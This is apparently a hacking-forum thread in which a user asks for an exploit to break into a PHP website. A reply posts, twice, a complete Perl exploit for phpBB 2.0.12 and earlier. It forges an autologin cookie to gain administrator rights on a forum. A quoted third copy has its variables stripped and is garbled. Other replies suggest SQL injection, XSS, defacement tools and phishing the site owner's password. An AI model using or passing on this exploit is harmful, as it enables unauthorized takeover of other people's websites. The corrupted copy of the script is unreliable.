An exploit to hack a php website?
An exploit to hack a php website?
hey does anyone have an exploit to hack a php website?
not a clue.
you are a lyar this adress is to your habamon not to exp[loits hack
#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB • View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";
# milw0rm.com [2005-03-21]
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB • View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;
my $host = $ARGV[0];
my $path = $ARGV[1];
my $user = $ARGV[2];
my $proxy = $ARGV[3];
my $request = "http://";
$request .= $host;
$request .= $path;
use HTTP::Cookies;
my $browser = LWP::UserAgent->new ();
my $cookie_jar = HTTP::Cookies->new( );
$browser->cookie_jar( $cookie_jar );
$cookie_jar->set_cookie( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",$host,,,,,);
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
$browser->proxy("http" , "http://$proxy");
}
print "++++++++++++++++++++++++++++++++++++\n";
print "Trying to connect to $host$path"; if ($proxy) {print "using proxy $proxy";}
my $response = $browser->get($request);
die "Error: ", $response->status_line
unless $response->is_success;
if($response->content =~ m/phpbbprivmsg/) {
print "\n Forum is vulnerable!!!\n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++\nTrying to get the user:$user ID...\n";
$response->content =~ /sid=([\w\d]*)/;
my $sid = $1;
$request .= "admin\/admin_ug_auth.php?mode=user&sid=$sid";
$response = $browser->post(
$request,
[
'username' => $user,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
if ($response->content =~ /name="u" value="([\d]*)"/)
{print " Done... ID=$1\n++++++++++++++++++++++++++++++\n";}
else {print "No user $user found..."; exit(); }
my $uid = $1;
print "Trying to give user:$user admin status...\n";
$response = $browser->post(
$request,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> $uid,
'submit'=> 'Submit'
],
);
die "Error: ", $response->status_line
unless $response->is_success;
print " Well done!!! $user should now have an admin status..\n++++++++++++++++++++++++++++";
# milw0rm.com [2005-03-21]
PHP is processed on server side and completely invisible on client side. near impossible to 'hack'
Try to use a defacer. I have used it when my friend gave me one but it's kinda hard to understand even i have a tutorial. The one who made that defacer hacked microsoft france site.
Originally Posted by Sjla
#!/usr/bin/perl -w
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB • View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;
my = ;
my = ;
my = ;
my = ;
my = "http://";
.= ;
.= ;
use HTTP::Cookies;
my = LWP::UserAgent->new ();
my = HTTP::Cookies->new( );
( );
( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",,,,,,);
if ( defined ) {
=~ s/(http://)//eg;
("http" , "http://");
}
print "++++++++++++++++++++++++++++++++++++n";
print "Trying to connect to "; if () {print "using proxy ";}
my = ();
die "Error: ",
unless ;
if( =~ m/phpbbprivmsg/) {
print "n Forum is vulnerable!!!n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++nTrying to get the user: ID...n";
=~ /sid=([wd]*)/;
my = $1;
.= "admin/admin_ug_auth.php?mode=user&sid=";
= (
,
[
'username' => ,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ",
unless ;
if ( =~ /name="u" value="([d]*)"/)
{print " Done... ID=$1n++++++++++++++++++++++++++++++n";}
else {print "No user found..."; exit(); }
my = $1;
print "Trying to give user: admin status...n";
= (
,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> ,
'submit'=> 'Submit'
],
);
die "Error: ",
unless ;
print " Well done!!! should now have an admin status..n++++++++++++++++++++++++++++";
# milw0rm.com [2005-03-21]
# phpBB <=2.0.12 session autologin exploit
# This script uses the vulerability in autologinid variable
# More: phpBB • View topic - phpBB 2.0.13 released - Critical Update
#
# Just gives an user on vulnerable forum administrator rights.
# You should register the user before using this ;-)
# by Kutas, kutas@mail15.com
#P.S. I dont know who had made an original exploit, so I cannot place no (c) here...
# but greets goes to Paisterist who made an exploit for Firefox cookies...
if (@ARGV < 3)
{
print q(
++++++++++++++++++++++++++++++++++++++++++++++++++ +
Usage: perl nenu.pl [site] [phpbb folder] [username] [proxy (optional)]
i.e. perl nenu.pl www.site.com /forum/ BigAdmin 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++ ++
);
exit;
}
use strict;
use LWP::UserAgent;
my = ;
my = ;
my = ;
my = ;
my = "http://";
.= ;
.= ;
use HTTP::Cookies;
my = LWP::UserAgent->new ();
my = HTTP::Cookies->new( );
( );
( "0","phpbb2mysql_data", "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs %3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D", "/",,,,,,);
if ( defined ) {
=~ s/(http://)//eg;
("http" , "http://");
}
print "++++++++++++++++++++++++++++++++++++n";
print "Trying to connect to "; if () {print "using proxy ";}
my = ();
die "Error: ",
unless ;
if( =~ m/phpbbprivmsg/) {
print "n Forum is vulnerable!!!n";
} else {
print "Sorry... Not vulnerable"; exit();}
print "+++++++++++++++++++++++++++++nTrying to get the user: ID...n";
=~ /sid=([wd]*)/;
my = $1;
.= "admin/admin_ug_auth.php?mode=user&sid=";
= (
,
[
'username' => ,
'mode' => 'edit',
'mode' => 'user',
'submituser' => 'Look+up+User'
],
);
die "Error: ",
unless ;
if ( =~ /name="u" value="([d]*)"/)
{print " Done... ID=$1n++++++++++++++++++++++++++++++n";}
else {print "No user found..."; exit(); }
my = $1;
print "Trying to give user: admin status...n";
= (
,
[
'userlevel' => 'admin',
'mode' => 'user',
'adv'=>'',
'u'=> ,
'submit'=> 'Submit'
],
);
die "Error: ",
unless ;
print " Well done!!! should now have an admin status..n++++++++++++++++++++++++++++";
# milw0rm.com [2005-03-21]
to answer the question i would require a link to the site in question or informaiton about php scripts its running.
Originally Posted by hanamana
PHP is processed on server side and completely invisible on client side. near impossible to 'hack'
php is processed server sided but retrives information from the cilent, when dealing with hacking logins you use the language php, to communicate directly with mysql which holds the user and passwords, and either exploit and read from the mysql tables or by pass the login buy making the site belive you entered a vaild login.
in short find or create a exploit. insert the malicious php code ie retrive usernames or create users.
you can do packet editing at php right?
There is a lot of ways to manipulate information and hack web sites. Hell if you're clever enough, you could just phish the site owner's password haha. I've found some tricks and scripts that have all pretty much sent false information, or constructed, to their server to rip out important aspects.
Look up SQL injection...
Originally Posted by GG2GG
way to fail, he said he wants to hack a php site, not phpbb forum script, fail again for posting a public exploit that you cant even use.
to answer the question i would require a link to the site in question or informaiton about php scripts its running.
to answer the question i would require a link to the site in question or informaiton about php scripts its running.
Learn how to XSS Script attack.
Similar Threads
- 33Last post
- Selling Hack Pack Including Website Downers, Viruses and more!By GRAPH1C-SALES in Trade Accounts/Keys/Items3Last post
- 17Last post
- 15Last post